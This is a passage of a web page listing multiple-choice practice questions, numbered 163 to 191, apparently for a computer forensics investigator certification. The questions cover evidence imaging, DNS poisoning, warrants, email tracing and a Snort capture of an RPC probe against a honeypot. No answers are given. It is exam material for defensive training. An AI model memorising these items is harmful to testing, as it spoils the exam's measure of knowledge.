downloading inappropriate images from the Internet to a PC in the Computer laB.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">a simple backup copy of the hard drive in the PC and put it on this drive and requests that you examine that</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">drive for evidence of the suspected images. You inform him that a simple backup copy will not provide</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">found is complete and admissible in future proceedings?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Bit-stream Copy</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Robust Copy</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Full backup Copy</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Incremental Backup Copy</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">164. You are assisting in the investigation of a possible Web Server Hack. The company who called you stated</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">that customers reported to them that whenever they entered the web address of the company in their</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">browser, what they received was a porno graphic web site. The company checked the web server and</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">nothing appears wrong. When you type in the IP address of the web</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">site in your browser everything appears normal. What is the name of the attack that affects the DNS cache</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">of the name resolution servers, resulting in those servers directing users to the wrong web site?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. ARP Poisoning</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. DNS Poisoning</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. HTTP redirect attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. IP Spoofing</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">165. In conducting a computer abuse investigation you become aware that the suspect of the investigation is</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">using ABC Company as his Internet Service Provider (ISP). You contact ISP and request that they provide</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">you assistance with your investigation. What assistance can the ISP provide?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The ISP can investigate anyone using their service and can provide you with assistance</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">their customers and therefore cannot assist you without a warrant</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The ISP can.t conduct any type of investigations on anyone and therefore can.t assist you</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. ISP.s never maintain log files so they would be of no use to your investigation</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">166. As a CHFI professional, which of the following is the most important to your professional reputation?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Your Certifications</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. The correct, successful management of each and every case</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The free that you charge</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The friendship of local law enforcement officers</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">167. You are conducting an investigation of fraudulent claims in an insurance company that involves complex</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">text searches through large numbers of documents. Which of the following tools would allow you to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">quickly and efficiently search for a string within a file on the bitmap image of the target</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">computer?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Stringsearch</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. grep</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. dir</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. vim</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">168. When cataloging digital evidence, the primary goal is to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Make bit-stream images of all hard drives</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Preserve evidence integrity</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Not remove the evidence from the scene</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Not allow the computer to be turned off</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">169. The police believe that Mevin Mattew has been obtaining unauthorized access to computers belonging to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">numerous computer software and computer operating systems manufacturers, cellular telephone</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">manufacturers, Internet Service Providers and Educational Institutions. They also suspect that he has been</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">stealing, copying and misappropriating proprietary computer software belonging to the several victim</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">companies. What is preventing the police from breaking down the suspects door and searching his home</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">and seizing all of his computer equipment if they have not yet obtained a warrant ?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The Fourth Amendment</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. The USA patriot Act</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The Good Samaritan Laws</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The Federal Rules of Evidence</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">170. A law enforcement officer may only search for and seize criminal evidence with</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">_______________________, which are facts or circumstances that would lead a reasonable person to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">believe a crime has been committed or is about to be committed, evidence of the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">specific crime exists and the evidence of the specific crime exists at the place to be searcheD.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Mere Suspicion</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. A preponderance of the evidence</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Probable cause</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Beyond a reasonable doubt</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">171. You are working as a Computer forensics investigator for a corporation on a computer abuse case. You</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">discover evidence that shows the subject of your investigation is also embezzling money from the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">company. The company CEO and the corporate legal counsel advise you to contact law enforcement and</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">provide them with the evidence that you have founD. The law enforcement officer that responds requests</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">that you put a network sniffer on your network and monitor all traffic to the subjects computer. You inform</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the officer that you will not be able to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">comply with that request because doing so would:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Violate your contract</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Cause network congestion</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Make you an agent of law enforcement</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Write information to the subjects hard drive</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">172. You have been asked to investigate after a user has reported a threatening e-mail they have received from</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">an external source. Which of the following are you most interested in when trying to trace the source of the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">message?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The X509 Address</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. The SMTP reply Address</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The E-mail Header</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The Host Domain Name</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">173. You have completed a forensic investigation case. You would like to destroy the data contained in various</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">disks at the forensics lab due to sensitivity of the case. How would you permanently erase the data on the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">hard disk?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Throw the hard disk into the fire</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Run the powerful magnets over the hard disk</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Format the hard disk multiple times using a low level disk utility</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Overwrite the contents of the hard disk with Junk data</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">174. Office Documents (Word, Excel and PowerPoint) contain a code that allows tracking the MAC or unique</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">identifier of the machine that created the document. What is that code called ?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Globally unique ID</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Microsoft Virtual Machine Identifier</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Personal Application Protocol</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Individual ASCII string</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">175. When using Windows acquisitions tools to acquire digital evidence, it is important to use a well- tested</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">hardware write-blocking device to:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Automate Collection from image files</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Avoiding copying data from the boot partition</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Acquire data from host-protected area on a disk</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Prevent Contamination to the evidence drive</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">176. An Expert witness give an opinion if:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The Opinion, inferences or conclusions depend on special knowledge, skill or training not within the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">ordinary experience of lay jurors</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. To define the issues of the case for determination by the finder of fact</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. To stimulate discussion between the consulting expert and the expert witness</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. To deter the witness form expanding the scope of his or her investigation beyond the requirements of the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">case</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">177. Printing under a Windows Computer normally requires which one of the following files types to be</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">created?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. EME</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. MEM</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. EMF</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. CME</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">178. Profiling is a forensics technique for analyzing evidence with the goal of identifying the perpetrator from</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">their various activity. After a computer has been compromised by a hacker, which of the following would</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">be most important in forming a profile of the incident?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The manufacturer of the system compromised</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. The logic, formatting and elegance of the code used in the attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The nature of the attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The vulnerability exploited in the incident</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">179. To preserve digital evidence, an investigator should ____________________</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Make tow copies of each evidence item using a single imaging tool</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Make a single copy of each evidence item using an approved imaging tool</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Make two copies of each evidence item using different imaging tools</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Only store the original evidence item</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">180. What is the name of the Standard Linux Command that is also available as windows application that can be</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">used to create bit-stream images ?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. mcopy</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. image</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. MD5</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. dd</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">181. ____________________ is simply the application of Computer Investigation and analysis techniques in the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">interests of determining potential legal evidence.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Network Forensics</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Computer Forensics</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Incident Response</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Event Reaction</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">182. During the course of a corporate investigation, you find that an Employee is committing a crime. Can the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Employer file a criminal complain with Police?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Yes, and all evidence can be turned over to the police</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Yes, but only if you turn the evidence over to a federal law enforcement agency</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. No, because the investigation was conducted without following standard police procedures</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. No, because the investigation was conducted without warrant</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">183. The ____________________ refers to handing over the results of private investigations to the authorities</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">because of indications of criminal activity.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Locard Exchange Principle</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Clark Standard</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Kelly Policy</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Silver-Platter Doctrine</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">184. This organization maintains a database of hash signatures for known software</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. International Standards Organization</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Institute of Electrical and Electronics Engineers</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. National Software Reference Library</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. American National standards Institute</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">185. One technique for hiding information is to change the file extension from the correct one to one that might</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">not be noticed by an investigator. For example, changing a .jpg extension to a .doc extension so that a</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">picture file appears to be a document. What can an investigator examine to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">verify that a file has the correct extension?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. the File Allocation Table</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. the file header</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. the file footer</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. the sector map</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">186. You are employed directly by an attorney to help investigate an alleged sexual harassment case at a large</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">pharmaceutical manufacture. While at the corporate office of the company, the CEO demands to know the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">status of the investigation. What prevents you from discussing the case with</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the CEO?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. the attorney-work-product rule</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Good manners</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Trade secrets</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. ISO 17799</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">187. Melanie was newly assigned to an investigation and asked to make a copy of all the evidence from the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">compromised system. Melanie did a DOS copy of all the files on the system. What would be the primary</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">reason for you to recommend a disk imaging tool?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. A disk imaging tool would check for CRC32s for internal self checking and validation and have MD5</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">checksum</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Evidence file format will contain case data entered by the examiner and encrypted at the beginning of</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the evidence file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. A simple DOS copy will not include deleted files, file slack and other information</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. There is no case for an imaging tool as it will use a closed, proprietary format that if compared to the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">original will not match up sector for sector</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">188. What information do you need to recover when searching a victims computer for a crime committed with</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">specific e-mail message?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Internet service provider information</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. E-mail header</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Username and password</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Firewall log</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">189. A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker . Given below is an</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the attacker by</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">studying the log. Please note that you are required to infer only what is explicit in the excerpt.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">(Note: The student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">connection concepts and the ability to read packet signatures from a sniff dump.)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111 TCP TTL:43 TOS:0¡¿0 ID:29726</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">IpLen:20 DgmLen:52 DF</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">NOP TS: 23678634 2878772</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111 UDP TTL:43 TOS:0¡¿0 ID:29733</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">IpLen:20 DgmLen:84</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Len: 64</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 ¡¦¡¦¡¦¡¦¡¦. 00 00 00 02 00 00 00 03 00 00 00 00 00</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">00 00 00 ¡¦¡¦¡¦¡¦¡¦. 00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ¡¦¡¦¡¦¡¦¡¦.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">00 00 00 11 00 00 00 00 ¡¦¡¦..</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 03/15-</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773 UDP TTL:43 TOS:0¡¿0 ID:29781 IpLen:20</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">DgmLen:1104</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Len: 1084</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The attacker has conducted a network sweep on port 111</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. The attacker has scanned and exploited the system using Buffer Overflow</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The attacker has used a Trojan on port 32773</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The attacker has installed a backdoor</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">190. One way to identify the presence of hidden partitions on a suspect.s hard drive is to:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Add up the total size of all known partitions and compare it to the total size of the hard drive</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Examine the FAT and identify hidden partitions by noting an H in the partition Type field</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Examine the LILO and note an H in the partition Type field</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. It is not possible to have hidden partitions on a hard drive</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">191. What does mactime, an essential part of the coroner.s toolkit do?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. It traverses the file system and produces a listing of all files based on the 